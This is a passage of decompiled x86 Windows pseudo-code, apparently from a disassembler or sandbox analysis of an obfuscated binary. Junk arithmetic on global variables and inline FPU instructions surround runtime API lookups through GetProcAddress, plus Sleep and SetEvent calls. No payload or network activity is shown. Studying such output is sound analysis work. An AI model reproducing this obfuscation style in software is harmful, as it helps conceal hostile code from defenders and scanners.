					 *0x3ce1a4 =  *0x3ce1a4 + st1;
					_v20 =  *0x3ce2b8 -  *0x3c8568;
					_t996 =  *0x3ce1a4 -  *0x3c8560;
					asm("fcomp qword [ebp-0x10]");
					asm("fnstsw ax");
					if((_t446 & 0x00000001) == 0) {
						_t609 =  *0x3ce0cc; // 0x35085801
						_v8 = _t609 - 0x697385f6;
						asm("fild dword [ebp-0x4]");
						_v20 = _t996;
						_t996 =  *0x3ce0f4 + _v20;
						 *0x3ce0f4 = _t996;
					}
				}
				_t642 =  *0x3ce49c; // 0x3b0d
				_v8 = _t642;
				asm("fild dword [ebp-0x4]");
				_v20 = _t996;
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce49c = E0039CABC();
				 *0x3ce478 =  *0x3ce478 + _t622;
				_t448 =  *0x3ce478; // 0x80000000
				if(_t448 != 0x980e2413) {
					_t778 =  *0x3ce17c; // 0xb2a9
					_t1001 =  *0x3ce5e4 +  *0x3c854c;
					_t643 =  *0x3ce060; // 0x54bf
					_v8 = _t778;
					_v20 = _t1001;
					asm("fild dword [ebp-0x4]");
					_v8 = _t643;
					asm("fsubr qword [ebp-0x10]");
					_v20 = _t1001;
					asm("fild dword [ebp-0x4]");
					 *0x3ce060 = E0039CABC();
					 *0x3ce17c =  *0x3ce17c + 1;
					_t1003 = _t1001 + _v20 +  *0x3ce5e4;
					 *0x3ce5e4 = _t1003;
				} else {
					_t1376 =  *0x3ce43c;
					_t753 =  *0x3ce0ec; // 0x2a1f8050
					_v20 = _t1376;
					_v8 = _t753;
					asm("fild dword [ebp-0x4]");
					asm("fsubr qword [ebp-0x10]");
					_v20 = _t1376;
					asm("fsubr qword [ebp-0x10]");
					 *0x3ce0c8 = E0039CABC();
					_t1003 =  *0x3ce444 - st1;
					 *0x3ce444 = _t1003;
					asm("fsubr dword [0x3ce43c]");
					 *0x3ce43c = _t1003;
				}
				_t644 =  *0x3cfc6c; // 0x74ca0000
				_t106 =  &_v76; // 0x736f6c43
				 *0x3d02b0 = GetProcAddress(_t644, _t106);
				 *0x3ce4fc =  *0x3ce4fc + 1;
				if(( *0x3ce018 & 0x0000ffff) - 0x798a1f5c != 0x97e134f1 - ( *0x3ce4fc & 0x0000ffff)) {
					_t873 =  *0x3ce0f8; // 0x9257
					_v8 = _t873;
					asm("fild dword [ebp-0x4]");
					 *0x3ce2e8 = _t1003;
				}
				_t1004 =  *0x3ce0d0;
				_t648 =  *0x3ce4f0; // 0x33413e50
				_v8 = _t648 - 0x2fc29afe;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				 *0x3ce0d0 = _t1004;
				 *0x3ce4f0 =  *0x3ce4f0 + 1;
				_t782 =  *0x3ce0e8; // 0xe89a10bc
				_t650 =  *0x3ce478; // 0x80000000
				 *0x3ce478 = _t650 * (0x414a94e1 - _t782);
				 *0x3ce0e8 =  *0x3ce0e8 + _t622;
				_t457 =  *0x3cfc6c; // 0x74ca0000
				_t458 = GetProcAddress(_t457,  &_v52);
				_t652 =  *0x3ce01c; // 0x9b827a58
				 *0x3cfc60 = _t458;
				 *0x3ce4d4 = _t652 +  *0x3ce4d4;
				 *0x3ce2fc =  *0x3ce2fc + 0xc279a6ca - ( *0x3ce2ac & 0x0000ffff);
				 *0x3ce31c =  *0x3ce31c + _t622;
				if(0x97c2a27b - ( *0x3ce31c & 0x0000ffff) == 0x889491e4) {
					 *0x3ce2ec =  *0x3ce2ec + _t622;
					_t872 =  *0x3ce2ec; // 0x76d570f4
					_v8 = _t872;
					asm("fild dword [ebp-0x4]");
					 *0x3ce1e0 = _t1004;
				}
				_t1005 =  *0x3ce0a4;
				_t462 =  *0x3ce24c; // 0x2b07f8d9
				_v36 = _t1005;
				_v8 = _t462;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1005;
				asm("fsubr qword [ebp-0x20]");
				 *0x3ce0a4 =  *0x3ce15c + _v20;
				asm("fld1");
				_t1009 = st0;
				asm("faddp st2, st0");
				asm("fxch st0, st1");
				 *0x3ce15c = _t1009;
				 *0x3ce24c =  *0x3ce24c + 1;
				_t657 =  *0x3ce0bc; // 0xdec
				_v8 = _t657;
				 *0x3d0448 = 0x3c3935;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1009;
				asm("fsubr qword [ebp-0x10]");
				_v36 =  *0x3ce344 -  *0x3c8548;
				_t463 =  *0x3ce5b4; // 0x1cd4718b
				asm("fsubr qword [0x3c8540]");
				_v8 = _t463;
				_v20 =  *0x3ce3a8;
				asm("fild dword [ebp-0x4]");
				asm("fsubr qword [ebp-0x10]");
				asm("fucompp");
				asm("fnstsw ax");
				asm("fld1");
				_t1015 =  *0x3ce3a8 + st0;
				asm("fxch st0, st1");
				 *0x3ce3a8 = _t1015;
				 *0x3ce0bc =  *0x3ce0bc + 1;
				if((_t463 & 0x00000044) != 0) {
					st0 = _t1015;
				} else {
					_t1015 =  *0x3ce428 +  *0x3c8538;
					 *0x3ce060 = E0039CABC();
					asm("fsubr qword [0x3ce428]");
					 *0x3ce428 = _t1015;
				}
				_t658 =  *0x3ce398; // 0x3cdb
				if(_t658 < 0xb67adf3e) {
					 *0x3ce1e0 =  *0x3ce1e0 + st1;
					_t1015 =  *0x3ce1e0;
					 *0x3ce3a8 = _t1015;
				}
				asm("fsubr dword [0x3ce0a8]");
				_t879 = 0;
				 *0x3ce0a8 = _t1015;
				_t1016 =  *0x3ce0a8;
				 *0x3ce5b8 = _t1016;
				E0039C990(0x3cfdb8, 0, 0x4b0);
				_t465 =  *0x3ce12c; // 0xd1b0ed04
				_v8 = _t465 - 0x6c9a36e0;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1016;
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce0e8 = E0039CABC();
				asm("fld1");
				asm("fxch st0, st1");
				 *0x3ce370 =  *0x3ce370 - st0;
				 *0x3ce12c =  *0x3ce12c + 1;
				_v20 =  *0x3ce1a4;
				_t1022 =  *0x3c8530 -  *0x3ce3b8;
				 *0x3d073c = 0;
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce1a4 = _t1022;
				_t659 =  *0x3ce024; // 0x80000001
				_v8 = _t659;
				asm("fild dword [ebp-0x4]");
				_v8 = _t1022;
				asm("fsubr dword [ebp-0x4]");
				 *0x3ce024 = E0039CABC();
				asm("fld1");
				_t1025 = st0;
				asm("faddp st2, st0");
				asm("fxch st0, st1");
				 *0x3ce468 = _t1025;
				_t788 =  *0x3ce4fc; // 0x94b9
				_v8 = _t788;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1025;
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce4fc = E0039CABC();
				 *0x3ce1d4 =  *0x3ce1d4 + st1;
				_v20 =  *0x3ce074;
				 *0x3ce0a4 =  *0x3ce0a4 + _v20;
				 *0x3ce074 =  *0x3ce074 - st1;
				 *0x3ce134 =  *0x3ce134 -  *0x3c8528;
				_t660 =  *0x3ce598; // 0xc37b
				_t789 =  *0x3ce4f0; // 0x33413e50
				 *0x3ce598 =  *0x3ce598 + _t622;
				if(_t789 <= _t660 + 0x5e719426) {
					 *0x3ce1f0 =  *0x3ce1f0 -  *0x3c8520;
				}
				_v20 =  *0x3ce07c;
				_t473 =  *0x3ce264; // 0x80000000
				_v8 = _t473;
				_v20 =  *0x3ce428 + _v20;
				asm("fild dword [ebp-0x4]");
				 *0x3ce264 = E0039CABC();
				_t661 =  *0x3d0448; // 0x3c3935
				 *0x3ce428 =  *0x3ce428 + st2;
				if( *((intOrPtr*)(_t661 + 0x4b0)) == _t879) {
					L44:
					_t1043 =  *0x3ce078;
					_t790 =  *0x3ce440; // 0xeb96
					_v20 = _t1043;
					_t476 = _t790 - 0x379534d5;
					_v8 = _t476;
					asm("fild dword [ebp-0x4]");
					asm("fsubr qword [ebp-0x10]");
					 *0x3ce078 = _t1043;
					 *0x3ce440 =  *0x3ce440 + 1;
					 *0x3ce074 =  *0x3ce074 - st1;
					_v20 =  *0x3ce074;
					asm("fucompp");
					asm("fnstsw ax");
					if((_t476 & 0x00000044) == 0) {
						_t729 =  *0x3ce108; // 0x5dc4
						 *0x3ce4d0 =  *0x3ce4d0 + 0x52b08505 - _t729;
						 *0x3ce108 =  *0x3ce108 + 1;
					}
					 *0x3ce490 =  *0x3ce490 *  *0x3c84e0;
					_t477 =  *0x3ce238; // 0xa35f
					 *0x3ce238 =  *0x3ce238 + _t622;
					_v20 =  *0x3c84d8 -  *0x3ce084;
					_v8 = 0xd3133a13 - _t477;
					asm("fild dword [ebp-0x4]");
					_t1055 = _v20;
					asm("fucompp");
					asm("fnstsw ax");
					if((_t477 & 0x00000044) == 0) {
						_t581 =  *0x3ce320; // 0xa75a
						_t1326 =  *0x3ce388 -  *0x3c84d4;
						_v8 = _t581;
						_v20 = _t1326;
						asm("fild dword [ebp-0x4]");
						_t1055 = _t1326 * _v20;
						 *0x3ce320 = E0039CABC();
					}
					 *0x3ce288 =  *0x3ce288 + 1;
					_t663 =  *0x3ce288; // 0x6ce1ec48
					_t794 =  *0x3d0448; // 0x3c3935
					 *0x3ce46c = _t663 + ( *0x3ce46c & 0x0000ffff);
					 *0x3ce47c =  *0x3ce47c + 0x14529278;
					_t479 =  *0x3ce144; // 0x80fe1c2e
					_v8 = _t479 + 0x17ff0099;
					_v32 = _t794 + 0x4b4;
					asm("fild dword [ebp-0x4]");
					_t880 = 0;
					 *0x3ce314 = _t1055;
					 *0x3ce144 =  *0x3ce144 + 1;
					_t1056 =  *0x3ce3e0;
					_t665 =  *0x3ce2b0; // 0xef43cad8
					_v8 = _t665 + 0x3390a4a3;
					asm("fild dword [ebp-0x4]");
					asm("fsubp st1, st0");
					 *0x3ce3e0 = _t1056;
					_v8 =  *0x3ce020 & 0x0000ffff;
					asm("fild dword [ebp-0x4]");
					_v20 = _t1056;
					_t1058 =  *0x3ce2b4 + _v20;
					 *0x3ce2b4 = _t1058;
					_t667 =  *0x3ce158; // 0x0
					_v8 = _t667;
					asm("fild dword [ebp-0x4]");
					_v20 = _t1058;
					asm("fsubr qword [ebp-0x10]");
					 *0x3ce158 = E0039CABC();
					_t797 =  *0x3ce368; // 0x80000000
					_v8 = _t797;
					asm("fild dword [ebp-0x4]");
					_v8 =  *0x3ce538 -  *0x3ce2d0;
					 *0x3ce368 = E0039CABC();
					 *0x3ce07c =  *0x3ce07c - st1;
					_v20 =  *0x3c84d0 -  *0x3ce054;
					 *0x3ce250 =  *0x3ce250 + _v20;
					 *0x3ce054 =  *0x3ce054 - st1;
					while(1) {
						 *0x3ce1d0 =  *0x3ce1d0 + 1;
						_t484 =  *0x3ce1d0; // 0x2f751c97
						if(_t484 - 0x62eda4e == 0x656127d6) {
							_t1312 =  *0x3ce468;
							_t724 =  *0x3ce008; // 0x894c
							_v44 = _t1312;
							_v8 = _t724 + 0x455c79a5;
							asm("fild dword [ebp-0x4]");
							_v12 = _t1312;
							asm("fsubr qword [ebp-0x28]");
							 *0x3ce468 =  *0x3ce050 + _v12;
						}
						_t1071 =  *0x3ce358;
						_t798 =  *0x3ce4bc; // 0x45d8d594
						_t487 =  *0x3ce5dc & 0x0000ffff;
						_v8 =  *0x3ce128 & 0x0000ffff;
						 *0x3ce5dc =  *0x3ce5dc + _t622;
						 *0x3ce4bc =  *0x3ce4bc + 1;
						asm("fild dword [ebp-0x4]");
						_v8 = _t798;
						asm("fsubp st1, st0");
						_v44 = _t1071;
						asm("fild dword [ebp-0x4]");
						_v8 = _t487 + 0x5ff558b3;
						asm("fsubr qword [ebp-0x28]");
						_v44 = _t1071;
						asm("fild dword [ebp-0x4]");
						asm("fcomp qword [ebp-0x28]");
						asm("fnstsw ax");
						if((_t487 & 0x00000005) != 0) {
							_t488 =  *0x3ce268; // 0xd18b
							_t671 =  *0x3ce608; // 0x3cd9
							_t672 =  *0x3ce0ec; // 0x2a1f8050
							_t229 = _t488 - 0x6e439af7; // -678085987
							 *0x3ce0ec = _t672 * (_t671 + _t229);
							 *0x3ce608 =  *0x3ce608 + _t622;
						} else {
							 *0x3ce48c = ( *0x3ce48c & 0x0000ffff) * 0x2ad26d76;
						}
						 *0x3ce4f0 =  *0x3ce4f0 + _t622;
						_t800 =  *0x3ce0bc; // 0xdec
						_t674 =  *0x3ce0c4; // 0x5bc0e411
						_t801 =  *0x3ce4f0; // 0x33413e50
						 *0x3ce0bc = _t801 + _t800 - _t674 + 0x9e32f02e;
						 *0x3ce0c4 =  *0x3ce0c4 + _t622;
						if(_t880 == 1) {
							break;
						}
						 *0x3ce55c = ( *0x3ce55c & 0x0000ffff) * 0x473bd0fc;
						 *0x3ce594 = E0039CABC();
						_t880 = 1;
						 *0x3ce520 =  *0x3ce520 +  *0x3c84b8;
						 *0x3ce154 = ( *0x3ce154 & 0x0000ffff) * ( *0x3ce26c & 0x0000ffff);
						_t714 =  *0x3ce368; // 0x80000000
						 *0x3ce5d0 = ( *0x3ce5d0 & 0x0000ffff) - _t714;
						 *0x3ce560 =  *0x3ce560 *  *0x3c84b0;
						 *0x3ce30c =  *0x3ce30c + ( *0x3ce230 & 0x0000ffff) + 0xa485660f;
						 *0x3ce268 = ( *0x3ce268 & 0x0000ffff) + 0x185043c9;
						_t1270 =  *0x3ce070 -  *0x3c84a8;
						 *0x3ce070 = _t1270;
						_t567 = 0xc9858f7e - ( *0x3ce5a8 & 0x0000ffff);
						_v8 = _t567;
						asm("fild dword [ebp-0x4]");
						_v44 = _t1270;
						 *0x3ce3a0 =  *0x3ce3a0 + _v44;
						 *0x3ce5a8 =  *0x3ce5a8 + 1;
						_t1273 =  *0x3ce110;
						asm("fcomp qword [0x3c84a0]");
						asm("fnstsw ax");
						if((_t567 & 0x00000041) != 0) {
							_t716 =  *0x3ce17c; // 0xb2a9
							_v8 = _t716;
							asm("fild dword [ebp-0x4]");
							_v44 = _t1273;
							asm("fsubp st1, st0");
							 *0x3ce380 =  *0x3ce4c8 + _v44;
						} else {
							_t727 =  *0x3ce174; // 0x7ed8a3c5
							_v8 = _t727;
							asm("fild dword [ebp-0x4]");
							_v44 = _t1273;
							 *0x3ce174 =  *0x3ce174 + 1;
							_t1320 =  *0x3ce240 -  *0x3c8498;
							asm("fcomp qword [ebp-0x28]");
							asm("fnstsw ax");
							if((_t567 & 0x00000005) != 0) {
								_t1322 =  *0x3ce248 + st1;
								 *0x3ce248 = _t1322;
								_t579 =  *0x3ce280; // 0xa4969772
								_v8 = _t579;
								asm("fild dword [ebp-0x4]");
								_v44 = _t1322;
								asm("fsubr qword [ebp-0x28]");
								 *0x3ce280 = E0039CABC();
							} else {
								_t849 =  *0x3ce080; // 0xf362bf6c
								_v8 = _t849 - 0x6c7cc448;
								asm("fild dword [ebp-0x4]");
								 *0x3ce170 = _t1320;
								 *0x3ce080 =  *0x3ce080 + _t622;
							}
						}
						 *0x3ce148 =  *0x3ce148 + st2;
						 *0x3ce074 =  *0x3ce148 +  *0x3c8488 +  *0x3c8480;
						 *0x3ce2d0 =  *0x3ce2d0 *  *0x3c8478;
						 *0x3ce5c4 = E0039CABC();
						_t1287 =  *0x3ce438 + st1;
						 *0x3ce438 = _t1287;
						 *0x3ce300 = 0xd400000;
						 *0x3ce304 = 0x41d241c6;
						_t569 =  *0x3ce5b4; // 0x1cd4718b
						_t717 =  *0x3ce594; // 0x80000001
						 *0x3ce4d0 = _t717 + _t569 + 0xcfa02057;
						 *0x3ce594 =  *0x3ce594 + 1;
						 *0x3ce5b4 =  *0x3ce5b4 + 1;
						 *0x3ce2c4 =  *0x3ce2c4 + _t622;
						_t841 =  *0x3ce2c4; // 0x9cc1
						_t719 =  *0x3ce040; // 0x80000000
						_t571 = _t841;
						_t842 =  *0x3ce24c; // 0x2b07f8d9
						_v8 = _t719 - _t571;
						asm("fild dword [ebp-0x4]");
						_v8 = _t842;
						_v28 = _t1287;
						asm("fild dword [ebp-0x4]");
						_v44 = _t1287;
						 *0x3ce24c =  *0x3ce24c + 1;
						asm("fcomp qword [ebp-0x18]");
						asm("fnstsw ax");
						if((_t571 & 0x00000041) != 0) {
							 *0x3ce088 =  *0x3ce088 + st2;
							_t572 =  *0x3ce390; // 0xcd6d4fea
							_t1293 =  *0x3ce088 +  *0x3c8468;
							_v8 = _t572;
							_v28 = _t1293;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1293 + _v28;
							 *0x3ce07c =  *0x3ce07c + _v28;
						} else {
							 *0x3ce1e0 =  *0x3ce1e0 -  *0x3c8470;
						}
						_t1297 =  *0x3ce2f0;
						asm("fsubrp st2, st0");
						asm("fxch st0, st1");
						 *0x3ce2f0 = _t1297;
						_t721 =  *0x3ce2f0; // 0x23000000
						_t843 =  *0x3ce2f4; // 0xc1d4f706
						_v20 = _t721;
						_v8 =  *0x3ce108 & 0x0000ffff;
						_v16 = _t843;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1297 + _v20;
						_t1300 =  *0x3ce388 + _v28;
						 *0x3ce388 = _t1300;
						_t844 =  *0x3ce58c; // 0x7fffffff
						_v8 = _t844;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1300;
						asm("fsubr qword [ebp-0x18]");
						 *0x3ce58c = E0039CABC();
						_t1304 =  *0x3ce370 *  *0x3c8458;
						 *0x3ce370 = _t1304;
						_t575 =  *0x3ce320 & 0x0000ffff;
						_v8 = _t575;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1304;
						asm("fsubr qword [ebp-0x18]");
						asm("fcompp");
						asm("fnstsw ax");
						_t1307 =  *0x3c8454 +  *0x3ce468;
						 *0x3ce468 = _t1307;
						if((_t575 & 0x00000005) != 0) {
							_t845 =  *0x3ce334; // 0xc334
							 *0x3ce4d0 =  *0x3ce4d0 + _t845;
							 *0x3ce334 =  *0x3ce334 + _t622;
						} else {
							_t848 =  *0x3ce4a8; // 0x1d14
							_t725 =  *0x3ce0ec; // 0x2a1f8050
							_v8 = _t725 + _t848 + 0x9a842597;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1307;
							 *0x3ce240 =  *0x3ce240 * _v28;
							 *0x3ce4a8 =  *0x3ce4a8 + _t622;
							 *0x3ce0ec =  *0x3ce0ec + 1;
						}
						Sleep(0xa); // executed
						_v28 =  *0x3ce248 +  *0x3c8450;
						 *0x3ce468 =  *0x3ce468 + _v28;
						asm("fld1");
						asm("fld1");
						asm("fxch st0, st1");
					}
					 *0x3ce2e0 =  *0x3ce2e0 *  *0x3c8448;
					 *0x3ce198 =  *0x3ce198 -  *0x3c8440;
					 *0x3ce5e8 =  *0x3ce5e8 -  *0x3c8438;
					_v28 =  *0x3ce090 -  *0x3ce130 +  *0x3c8430;
					 *0x3ce130 =  *0x3ce130 + _v28;
					 *0x3ce130 =  *0x3ce130 + st1;
					 *0x3ce070 =  *0x3ce070 -  *0x3c8428;
					_t494 =  *0x3ce4d0; // 0x6c745516
					_t675 =  *0x3ce0f0; // 0xfafdf6a6
					 *0x3ce4d0 =  *0x3ce4d0 + 1;
					 *0x3ce0f0 =  *0x3ce0f0 + 1;
					if(_t675 + 0x62c0feec >= _t494 + 0xa8ea3d26) {
						_t835 =  *0x3ce0bc; // 0xdec
						_t712 =  *0x3ce350; // 0xdea3a412
						 *0x3ce3d4 = _t835 - _t712 + 0x64a54235;
					}
					 *0x3ce16c = 0xffff93ae;
					_t1088 =  *0x3ce3f0 -  *0x3c8420;
					 *0x3ce3f0 = _t1088;
					_t496 =  *0x3ce330; // 0xd6366c82
					_t677 =  *0x3ce11c; // 0x760d9cf6
					_t277 = _t496 + 0x980c45a; // 0x7f8e6150
					_v8 = _t677 + _t277;
					asm("fild dword [ebp-0x4]");
					_v28 = _t1088;
					_t1090 =  *0x3ce0d0 +  *0x3c8418;
					asm("fsubr qword [0x3c8410]");
					asm("fcomp qword [ebp-0x18]");
					asm("fnstsw ax");
					if((_t496 & 0x00000005) == 0) {
						_t550 =  *0x3ce288; // 0x6ce1ec48
						_v8 = _t550 + 0x22ae97cf;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1090;
						 *0x3ce110 =  *0x3ce470 + _v28;
						_t1090 =  *0x3ce470 - st2;
						 *0x3ce470 = _t1090;
						 *0x3ce288 =  *0x3ce288 + 1;
					}
					 *0x3ce04c = ( *0x3ce04c & 0x0000ffff) - 0x782aaca0;
					_t497 =  *0x3ce11c; // 0x760d9cf6
					_t805 =  *0x3ce610; // 0x7e9f9aaf
					_t498 = _t497 + 0x872523e6;
					 *0x3ce11c = _t805 + _t498;
					 *0x3ce610 =  *0x3ce610 + 1;
					asm("fsubr dword [0x3ce43c]");
					 *0x3ce43c = _t1090;
					_v44 =  *0x3ce338;
					_v28 =  *0x3ce568 +  *0x3c8408;
					asm("fsubr qword [ebp-0x18]");
					asm("fcomp qword [ebp-0x28]");
					asm("fnstsw ax");
					 *0x3ce568 =  *0x3ce568 + st1;
					if((_t498 & 0x00000041) != 0) {
						 *0x3ce1b8 =  *0x3c8404 -  *0x3ce1e4 -  *0x3c8400;
					} else {
						 *0x3ce0cc = E0039CABC();
					}
					_t680 =  *0x3ce5b4; // 0x1cd4718b
					 *0x3ce398 = ( *0x3ce398 & 0x0000ffff) - _t680 + 0x4d8d5763;
					 *0x3ce5b4 =  *0x3ce5b4 + 1;
					_t807 =  *0x3ce410; // 0xdab4
					_t290 = ( *0x3ce5d4 & 0x0000ffff) - _t807 - 0x5c6469d7; // -1066399820
					 *0x3ce5d4 = ( *0x3ce2f8 & 0x0000ffff) + _t290;
					 *0x3ce470 =  *0x3ce470 *  *0x3c83f8;
					asm("fsubr qword [0x3c83f0]");
					_t1103 =  *0x3ce240 -  *0x3c83e8;
					_v8 =  *0x3ce4fc & 0x0000ffff;
					_v28 = _t1103;
					asm("fild dword [ebp-0x4]");
					_t507 = E0039CABC();
					_t881 = _v32;
					 *0x3ce4fc = _t507;
					_v32 = 4;
					 *0x3ce240 = _t1103 + _v28 +  *0x3ce240;
					while(1) {
						_t809 =  *0x3ce59c; // 0xe29
						_t684 =  *0x3ce5c4; // 0x7fffffff
						 *0x3ce5c4 = _t684 * (_t809 + 0x36cd7c41);
						_t511 = SetEvent( *(0x3cfdb8 + ( *_t881 & 0x0000ffff) * 4));
						 *0x3ce5fc =  *0x3ce5fc -  *0x3c83e4;
						_v28 =  *0x3ce338 -  *0x3c83e0 +  *0x3c83dc;
						asm("fucompp");
						asm("fnstsw ax");
						asm("fld1");
						asm("faddp st2, st0");
						asm("fxch st0, st1");
						 *0x3ce338 = st0;
						if((_t511 & 0x00000044) == 0) {
							_t710 =  *0x3ce390; // 0xcd6d4fea
							 *0x3ce390 = _t710 * 0xdbfe4457;
						}
						asm("fsubp st1, st0");
						 *0x3ce188 =  *0x3ce0b0 -  *0x3c83d8;
						_v28 =  *0x3ce344;
						 *0x3ce344 =  *0x3ce2b8 + _v28;
						 *0x3ce588 =  *0x3ce588 + _t622;
						asm("fld1");
						asm("fxch st0, st1");
						 *0x3ce5f0 =  *0x3ce5f0 + st0;
						_v28 =  *0x3ce248;
						_t811 =  *0x3ce588; // 0xb5d5
						_t1125 =  *0x3ce548 + _v28;
						_t686 =  *0x3ce5f0; // 0x298257ec
						_t812 =  *0x3ce5f4; // 0x43a124fa
						_v28 = _t1125;
						_v8 = _t811;
						_t513 =  *0x3ce458; // 0x5bdf
						_v20 = _t686;
						asm("fild dword [ebp-0x4]");
						asm("fsubr qword [ebp-0x18]");
						_v8 = _t513;
						_v16 = _t812;
						_t813 =  *0x3ce0dc; // 0x5ed85cde
						 *0x3ce0dc =  *0x3ce0dc + _t622;
						_v44 = _t1125;
						asm("fild dword [ebp-0x4]");
						_v8 = _t813;
						asm("fsubr qword [ebp-0x10]");
						_v28 = _t1125;
						asm("fild dword [ebp-0x4]");
						asm("fsubr qword [ebp-0x18]");
						_t1126 = _v44;
						asm("fucompp");
						asm("fnstsw ax");
						if((_t513 & 0x00000044) == 0) {
							_v28 =  *0x3ce050;
							_t548 =  *0x3ce080; // 0xf362bf6c
							_t1257 =  *0x3ce344 + _v28;
							_v8 = _t548;
							_v28 = _t1257;
							asm("fild dword [ebp-0x4]");
							_t1126 = _t1257 + _v28;
							_t513 = E0039CABC();
							 *0x3ce080 = _t513;
						}
						while(1) {
							_t688 =  *0x3ce1d0; // 0x2f751c97
							_v8 = _t688;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1126;
							asm("fucompp");
							asm("fnstsw ax");
							 *0x3ce2f0 =  *0x3ce2f0 - st1;
							_t1134 =  *0x3ce4a0 + st1;
							 *0x3ce4a0 = _t1134;
							 *0x3ce1d0 =  *0x3ce1d0 + _t622;
							if((_t513 & 0x00000044) == 0) {
								_t1134 =  *0x3c83c0;
								asm("fucompp");
								asm("fnstsw ax");
								if((_t513 & 0x00000044) == 0) {
									_t1134 =  *0x3ce438;
									_t834 =  *0x3ce2c4; // 0x9cc1
									_v28 = _t1134;
									_v8 = _t834 - 0x69e407d5;
									asm("fild dword [ebp-0x4]");
									asm("fsubr qword [ebp-0x18]");
									 *0x3ce438 = _t1134;
									 *0x3ce2c4 =  *0x3ce2c4 + 1;
								}
							}
							 *0x3ce5dc = ( *0x3ce5dc & 0x0000ffff) - ( *0x3ce284 & 0x0000ffff);
							 *0x3ce284 =  *0x3ce284 + _t622;
							 *0x3ce598 =  *0x3ce598 + _t622;
							_t515 =  *0x3ce508; // 0x8dea
							_t332 = _t515 + 0x4c99e23a; // 0x4c9a7efb
							_t517 = ( *0x3ce598 & 0x0000ffff) + _t332;
							_v8 = _t517;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1134;
							 *0x3ce508 =  *0x3ce508 + 1;
							_t1136 = _v28;
							asm("fucompp");
							asm("fnstsw ax");
							if((_t517 & 0x00000044) != 0) {
								 *0x3ce0dc =  *0x3ce0dc + _t622;
								_v28 =  *0x3ce2e8;
								_v28 =  *0x3ce0b4 + _v28;
								_t518 =  *0x3ce2fc; // 0x3a84af9e
								_t817 =  *0x3ce0dc; // 0x5ed85cde
								 *0x3ce2fc =  *0x3ce2fc + _t622;
								_t519 = _t518 + 0xc0df8e24;
								_v28 =  *0x3ce058 + _v28;
								_v8 = _t817 + _t519;
								asm("fild dword [ebp-0x4]");
								asm("fcomp qword [ebp-0x18]");
								asm("fnstsw ax");
								 *0x3ce058 =  *0x3ce058 + st1;
								_t1136 =  *0x3ce2e8 - st2;
								 *0x3ce2e8 = _t1136;
								if((_t519 & 0x00000041) == 0) {
									_t1136 =  *0x3ce380 +  *0x3c83b8;
									 *0x3ce380 = _t1136;
								}
							} else {
								_t709 =  *0x3ce178; // 0x21a7
								 *0x3ce530 =  *0x3ce530 - _t709;
							}
							if( *(0x3cfdb8 + ( *_t881 & 0x0000ffff) * 4) == 0) {
								break;
							}
							 *0x3ce530 = 0xe1ab33d9;
							_t706 =  *0x3ce230; // 0xeabf
							_t830 =  *0x3ce080; // 0xf362bf6c
							_t541 = _t706 + 0xdd827551;
							_v8 = _t830 + _t541;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1136;
							asm("fcomp qword [ebp-0x18]");
							asm("fnstsw ax");
							 *0x3ce260 =  *0x3ce260 + st2;
							if((_t541 & 0x00000005) != 0) {
								 *0x3ce3c0 =  *0x3ce3c0 - st1;
								 *0x3ce4b0 =  *0x3ce3c0 -  *0x3c83a8 -  *0x3c83a0;
							} else {
								_v28 =  *0x3ce2a8;
								asm("fsubr qword [ebp-0x18]");
								 *0x3ce2a8 =  *0x3ce084 +  *0x3c83b0;
								 *0x3ce084 =  *0x3ce084 - st2;
							}
							_t542 =  *0x3ce28c; // 0x0
							_v8 = _t542;
							_v28 =  *0x3ce428 -  *0x3c8398;
							asm("fild dword [ebp-0x4]");
							asm("fcomp qword [ebp-0x18]");
							asm("fnstsw ax");
							_t1227 =  *0x3ce428 + st1;
							 *0x3ce428 = _t1227;
							if((_t542 & 0x00000041) != 0) {
								st0 = _t1227;
								st0 = _t1227;
							} else {
								_v28 =  *0x3ce100 +  *0x3ce088;
								_v28 =  *0x3ce07c + _v28;
								 *0x3ce5fc =  *0x3ce5fc * _v28;
								asm("faddp st2, st0");
								asm("fxch st0, st1");
								_t1227 =  *0x3ce100 + st1;
								 *0x3ce100 = _t1227;
								asm("fsubr qword [0x3ce088]");
								 *0x3ce088 = _t1227;
							}
							_t832 =  *0x3ce12c; // 0xd1b0ed04
							_v8 = _t832;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1227;
							_t1229 =  *0x3ce184 + _v28;
							 *0x3ce184 = _t1229;
							Sleep(0xa);
							 *0x3ce1fc =  *0x3ce1fc + 1;
							_t543 =  *0x3ce048; // 0xcf94
							_t708 =  *0x3ce1fc; // 0x80000000
							_t365 = _t543 + 0x30ecaba4; // 0xb0ecaba4
							 *0x3ce048 = _t708 + _t365;
							 *0x3ce0fc =  *0x3ce0fc + _t622;
							_t513 =  *0x3ce0fc; // 0xe5101c30
							_v8 = _t513;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1229;
							asm("fsubr qword [ebp-0x18]");
							_v28 =  *0x3ce134 +  *0x3c8390;
							asm("fcomp qword [ebp-0x18]");
							asm("fnstsw ax");
							asm("fld1");
							asm("fxch st0, st1");
							 *0x3ce1d8 =  *0x3ce1d8 + st0;
							if((_t513 & 0x00000041) == 0) {
								_t513 = E0039CABC();
								 *0x3ce570 = _t513;
							}
							_t1126 =  *0x3ce518 *  *0x3c8384;
							 *0x3ce518 = _t1126;
							asm("fld1");
							asm("fxch st0, st1");
						}
						_t691 =  *0x3ce390; // 0xcd6d4fea
						_v8 = _t691;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1136;
						 *0x3ce470 =  *0x3ce470 + _v28;
						_t819 =  *0x3ce294; // 0x5fbc
						_v8 = _t819;
						asm("fild dword [ebp-0x4]");
